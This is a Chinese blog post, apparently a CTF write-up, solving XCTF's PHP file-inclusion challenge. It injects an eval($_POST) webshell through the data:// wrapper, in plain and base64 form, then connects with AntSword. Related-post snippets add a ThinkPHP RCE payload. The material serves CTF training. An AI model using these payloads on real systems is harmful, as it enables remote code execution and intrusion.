【XCTF高手进阶区】web4_Web_php_include writeup(四)

最新推荐文章于 2022-10-20 16:45:51 发布
最新推荐文章于 2022-10-20 16:45:51 发布
阅读量347 收藏
点赞数 1
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mitchell_Donovan/article/details/113289938
版权

web4_Web_php_include

原题链接

key:data://伪协议+一句话木马

 

此题其他解法👇

XCTF高手进阶区 web4_Web_php_include writeup(一)

XCTF高手进阶区 web4_Web_php_include writeup(二)

XCTF高手进阶区 web4_Web_php_include writeup(三)

 

①又双叒叕又双叒叕是这道题,不过这次用的是比前三个都秀的解法

还记得在(二)中我们用到的data://伪协议吗

不记得的话先来复习一下吧👇

data://伪协议

👉直接形式

data://text/plain,<?php 执行内容 ?>

👉base64加密形式

data://text/plain;base64,执行内容加密后的代码

 

②这一次既不需要system命令,也不需要传到指定目录

我们直接传🐎

GET上传下列任意一个参数👇

直接形式
?page=data://text/plain,<?php eval($_POST['Mitchell']); ?>
加密形式
?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbJ01pdGNoZWxsJ10pOyA/Pg==

传🐎成功,一步到位

 

③用蚁剑连接👇

双击打开就能看到flag文件👇

 

 

 

这道题还有其他解法,比如官方给出的wp就是HTTP协议绕过,可是我死活看不懂,有兴趣可以去康康~

Mitch311
关注
专栏目录
PHP渗透测试题目笔记
Zeker62的博客
02-10 5645
最简单反序列化漏洞陷阱题 PHP反序列化漏洞PHP魔术方法执行顺序CTFHub-2020网鼎杯AreUSerialz攻防世界:unserialize3题目解析攻防世界:PHP2 最简单反序列化漏洞 简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件 <?php // 关闭错误报告 error_reporting(0); include "flag.php"; $key="020202"; $str=$_GET['str']; if(unserializ
攻防世界 Web_php_include 解题思路
xj28555的博客
07-07 4214
进入题目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这题有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
php序列化和反序列化-ctf
时光凉春衫薄的博客
08-08 1205
<?php error_reporting(0); include "key4.php"; $TEMP = "Whatever is worth doing is worth doing well."; $str = $_GET['str']; if (unserialize($str) === $TEMP) { echo "$key4"; } show_source(__FILE__); 通过上述得知unserialize($str)中反序列化后的值等于Whatever is worth.
XCTF高手进阶web4_Web_php_include writeup(三)
Mitchell_Donovan的博客
01-28 297
web4_Web_php_include 原题链接 key:SQL注入+一句话木马 ①又双叒叕是这道题,不过这一次我们我们用一个更加风骚的解法 老话说得好,如果没思路了就去扫描一下???? 扫描发现了phpmyadmin后台???? ②双击它进入登录页面 username为root,password为空,登录???? ③进入SQL语句输入的地方 先输入并执行如下SQL语句???? show variables like "secure_file_priv"
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 8113
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
PHP 面向对象
苦涩
08-19 206
<?php // 定义类:首字母大写,大驼峰命名 class Humanity{ // 定义变量 public $name; public $sex; public $age = 22; // 定义常量 const HOME = 'earth'; // 定义方法:首字母小写,小驼峰命名 public function eat($food)
XCTF-WEB进阶php_rce
Lorezon的博客
03-15 318
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...
XCTF 逆向进阶Windows_Reverse1——WriteUp
qq_43547885的博客
02-20 1124
题目链接: Windows_Reverse1 答题过程 脱壳 首先将程序拖入 Exeinfo PE 中查看相关信息: 发现程序有upx壳, 使用upx -d将壳脱去: 脱壳显示成功, 但奇怪的是程序一运行就闪退. 先不讨论该问题, 最后再来研究. IDA PRO 分析程序 用 IDA PRO 打开该程序, 直接查看反编译代码, 发现程序逻辑非常清晰:int __cdecl main(int...
XCTF-WEB-Web_php_include
Lorezon的博客
03-15 692
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
XCTFWeb进阶部分 WriteUp(一)
野原新之助
10-24 826
文章目录1、unserialize32、Web_php_unserialize3、supersqli(随便注)分析方法一:修改表结构方法二:预处理4、warmup5、web2 终于搭建了自己的网站,已经初具形态,之后大部分博文都会发布在自己的网站上,少量会同步在CSDN,小伙伴们可以去那里看我的一些学习分享呦???? (最近在申请备案,因此网站暂时无法访问……) 传送门:https://www.yyxzz.net 1、unserialize3 题目是一段php代码,是反序列化题目,需要将序列化结果通
XCTF WEB 高手进阶 unserialize3
qq_30076719的博客
11-04 244
看题目名字可以知道,这一题考的是反序列化漏洞,那么要做这一题之前,需要补充一点知识 1、序列化函数:serialize(),简单理解就是把类实例化的代码转换成字符串,可以在url上赋值,会先调用 __sleep()魔术方法 2、反序列化函数:unserialize(),很明显,就是把字符串还原,会先调用__wakeup()魔术方法 3、反序列化漏洞,这个要先理解序列化后的字符串: o:4:“xctf”:1:{s:4:“flag”;s:3:“111”;} o表示对象 a表示数组 s表示字符 i表示数字 其后数
webx—Schema使用
java开发指南博客 【转载】
06-14 109
XML Schema 的作用是定义 XML 文档的合法构建模块,类似 DTD。 Schema的概念中比较难理解的是命名空间(Namespace):一个Schema可以看作是若干个元素、类型组成的集合,它们属于一个特定的命名空间。通俗来讲,命名空间相关于java中的package一样,虽然内部元素的名称可能一样,但是由于来自不同的Namespace,所以不会发生冲突。 webx3...
XCTFWeb_php_include
小白渣的博客
10-29 6025
首先打开题目看到一串源码,对它进行审计 得到一个变量page 百度了一下strstr函数发现它对大小写十分敏感,所以我们可以用大写来进行绕过,这里简单普及一下这个函数的用法, strstr(str1,str2) 函数用于判断字符串str2是否是str1的子串。如果是,则该函数返回 str1字符串从 str2第一次出现的位置开始到 str1结尾的字符串;否则,返回NULL。 ...
攻防世界-Web_php_include四种解法)
笑花大王
01-20 4587
攻防世界-Web_php_include (考察的是文件包含) 打开页面是这样一段代码从代码中得知page中带有php://的都会被替换成空 str_replace()以其他字符替换字符串中的一些字符(分大小写) strstr() 查找字符串首次出现的位置。返回字符串剩余部分 <?php show_source(__FILE__); echo $_GET['hello'];...
HttpWebRequest 采集网站数据
热门推荐
songhuan的专栏
08-18 1万+
Imports System.NetImports System.IOImports System.TextImports System.Text.RegularExpressionsImports System.WebPublic Class Form5    Const RedirectPatten = "^window.location.replace/(""(?.*)""/);   
【CTF工具】GitHack下载安装与使用(windows下)
Mitchell_Donovan的博客
04-24 7740
下载方法 ①从github官网下载https://github.com/lijiejie/GitHack ②从codechina镜像站下载https://codechina.csdn.net/mirrors/lijiejie/githack 使用方法 下载之后解压缩,并通过cmd使用 具体操作???? ①win+R打开cmd终端,进入githack的目录下 ②使用如下代码进行下载???? python GitHack.py http://www.openssl.org(目标网址)/.g
【CTF工具】GitHack下载安装与使用(linux下)
Mitchell_Donovan的博客
04-24 5158
下载方法 ①直接通过git下载 git clone https://github.com/lijiejie/GitHack ②通过git镜像站下载 git clone https://github.com.cnpmjs.org/lijiejie/GitHack 使用方法 ①打开终端,进入到GitHacker的目录下 ②运行如下代码???? python GitHack.py http://www.openssl.org(目标网址)/.git/ 执行后会在本目录生成以网址为名字的文
【CTF工具】网址扫描器dirsearch下载安装与使用(linux下)
Mitchell_Donovan的博客
04-26 4330
dirsearch是一个python开发的目录扫描工具 和我们平时使用的dirb、御剑之类的工具一样,就是为了扫描网站的敏感文件和目录从而找到突破口 Linux下的使用教程如下: 下载安装 打开linux终端输入以下代码???? git clone https://github.com/maurosoria/dirsearch.git 使用说明 在终端中打开dirsearch文件夹???? cd dirsearch/ 输入下列命令开始网址扫描???? ./dirsearch.
BugkuCTF web18_秋名山车神 writeup
Mitchell_Donovan的博客
01-11 2543
web18_秋名山车神 原题链接 key:python脚本 ①题目环境里的网页长这样式的???? 意思是2s内让我们算一个变态表达式,疯了吧 刷新多次,发现数字是变化的,问题更严重了...... 不过刷新过程中发现了要提交的参数value???? ②不妨写个(白嫖)python脚本吧 本题采用正则表达式,如果不熟悉这个可以先看看教程:正则教程 import requests #引入request库 import re #引入re库 url = '''http:/
pure_color xctf
最新发布
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值